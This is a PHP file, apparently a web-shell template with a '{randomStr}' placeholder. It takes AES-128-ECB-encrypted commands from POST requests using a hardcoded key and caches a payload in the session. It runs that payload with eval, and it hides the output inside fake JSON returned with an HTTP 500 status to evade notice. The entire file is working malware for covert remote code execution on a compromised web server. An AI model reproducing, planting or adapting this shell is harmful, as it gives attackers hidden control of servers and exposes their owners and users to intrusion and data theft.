<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function aes128($data,$mode){$result="";$blocksize=16;$key=base64_decode("AQIDBAUGBwgJEBESExQVFg==");if($mode==1){$pad=$blocksize -(strlen($data)% $blocksize);$data .=str_repeat(chr($pad), $pad);}if(function_exists("openssl_encrypt")){if($mode==1){$result=openssl_encrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}else{$result=openssl_decrypt($data,"AES-128-ECB",$key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING);}}else if(function_exists("mcrypt_encrypt")){if($mode==1){$result=mcrypt_encrypt("rijndael-128", $key, $data, "ecb", "");}else{$result=mcrypt_decrypt("rijndael-128", $key, $data, "ecb", "");}}if($mode==2){$pad=ord($result{strlen($result)-1});if($pad > strlen($result))return false;if(strspn($result, chr($pad), strlen($result)- $pad)!=$pad)return false;$result=substr($result, 0, -1 * $pad);}return $result;}
$requestData = file_get_contents("php://input");$strSize = strlen($requestData);$requestData = substr($requestData,34,strlen($requestData)-37);
$requestData = pack("H*",$requestData);$requestData = aes128($requestData, 2);
$payloadName="{randomStr}";
if (isset($_SESSION[$payloadName])){
$payload=base64_decode($_SESSION[$payloadName]);
eval($payload);
$responseData = @run($requestData);
$responseData = base64_encode($responseData);
$responseData=base64_decode("eyJjb2RlIjoib2siLCJtc2ciOnsiY29udGVudCI6Ig==").$responseData;$responseData.=base64_decode("In19");@http_response_code(500);header("Content-Type: application/json");echo $responseData;
}else{
$_SESSION[$payloadName] = base64_encode($requestData);
}